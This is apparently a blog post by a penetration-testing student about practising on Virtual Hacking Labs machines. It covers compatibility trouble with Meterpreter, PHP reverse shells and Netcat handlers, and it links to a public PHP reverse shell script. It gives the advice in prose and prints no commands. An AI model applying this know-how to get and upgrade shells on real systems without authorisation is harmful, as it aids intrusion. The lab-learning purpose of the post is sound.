The compatible issues of different Shells and handlers
When I am doing the machines of Virtual Hacking Labs, one of the major issues that make me suffer me a lot is the compatibility between different environments. Windows, Linux, 64 bits, 32 bits, I even dealt with an ARM64 Windows 10.
Therefore, how to make my scripts work on the targets is super challenging. I do most of the hacking stuff with my Kali Linux. Kali has “mingw” to solve parts of the problems but not all of them. Not to mention that my CPU is x86_64. While today the ARM CPUs are getting more and more popular.
The compatibility of different Shells is also a very tricky problem. I understand for most enter level hackers, if they can get a shell from a victim, which means they can run any customized commands as their wish, they will be very excited. However, getting a shell is not everything for hacking. Instead, it is just an initial foothold for a further attack such as Privilege Escalation, Active Directory Attack, and Attacking hidden network.
At that time, dealing with the Shell properly is essential. This is ignored significantly by most junior penetration testers since there are almost no resources talking about that on the Internet.
One of the primary shells I love so much is the Meterpreter Shell. Since it works perfectly with Metasploit. It also has a lot of additional functions that can save me a lot of time than doing it manually. One function that I recommend greatly is the Privilege Escalation suggester. I abused it so much when I am targeting a lot of aged operating systems. An aged operating means it was released two or three years ago from now! Sometimes it is a lifesaver. It is good at exploiting Kernel vulnerabilities. If I cannot find any misconfiguration issues do the Privilege Escalation manually. I will use it to exhaust potential Kernel Vulnerabilities quickly. And I do not need to worry about the compatible issue anymore if I get a Meterpreter reverse_TCP Shell. I highly respect a lot of guys doing everything manually instead of these tools. However, my goal is to root two machines every day. I simply do not have enough time to research all vulnerabilities I have met. Even OSCP allows me to hack one box with Metasploit.
However, most of the initial shells I get are not Meterpreter reverse_tcp Shell. Metasploit has one module to upgrade the initial shell into a Meterpreter Shell. However, it fails most of the time. Sometimes, it succeeds, but offers a 32 bits Meterpreter shell, while my Kali and the target are running 64 bits systems.
The output of 32 bits Meterpreter reverse_tcp shell.
The output of 64 bits Meterpreter reverse_tcp shell, that I generated manually. By the following commands.
The difference between PHP/Meterpreter and Meterpreter/reverse_TCP
领英推荐
Remember! if your initial shell is generated by other rare payloads, especially PHP, you should convert it to the two most common formats immediately. PHP is extremely good at creating vulnerabilities and bugs. The best PHP reverse Shell code monkey has bugs too! The connection of the shell triggered by Monkey PHP reverse shell and handled by Netcat handler is stable. However, when you need to upgrade it to a fully functional stty Shell. It cannot work!
The link of monkey.
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Meterpreter Shell is very powerful. it can deal with a lot of situations. Nevertheless, it cannot deal with everything. Because Metepreter Shell is designed to hack other machines instead of ourselves. If Metepreter Shell also runs some codes in my Kali Linux to configure something, I will not be comfortable. I suppose most of the hackers will not be happy as well.
However, sometimes, we need to customize our machines too. In most cases, if we need to use to default text editor of most Linux machines such as vi or nano, we have to configure the bash on our end to be compatible with the bash on the end of the victim. Therefore, Metepreter Shells cannot work properly since it only deals with the stuff of the victims’ end.
At that time, I abuse the Netcat handler a lot. Be careful, the Netcat handler should be triggered by bash, while the default Shell of Kali Linux is Zsh. In addition, to make the Netcat handler works well, I highly recommend you guys can regenerate the shell code with the following commands.
I know some python one-liners can also work well with the Netcat handler. However, there are multiple kinds of python one-liners. To eliminate all the incompatible possibilities, I insist on the most common payloads.
For Windows systems, you can do the similar. The good news for Windows is that you can have a PowerShell in most cases. That is why I hate Windows XP! It is vulnerable. However, it has no PowerShell, it has too many incompatible issues since it is too old!
Then, you can do the rest stuff by following the blog.
Notice that the blog was released 5 years ago. At that time, bash is the default terminal for attacking machines, that is why there is no need to convert your Zsh to bash first.
I saw a lot of guys in kinds of blogs stating that the machine XXXX was so easy. He could root it in ten minutes. I believe he told the truth. He can root it in ten minutes, maybe it would take me hours. But for a few guys, who believe they are cyber security professionals, even get years of blue team experience, and are paid well, they would never be able to root one machine. So many details! Just one of them can ruin everything.
Some people believe vulnerability scanners can deal with everything. They don’t know there are millions of vulnerability exploits on Github. Only very few of them can work well with little customization such as changing the IP address and ports. Some of them even need to be debugged. Can scanners do that? I don’t think so.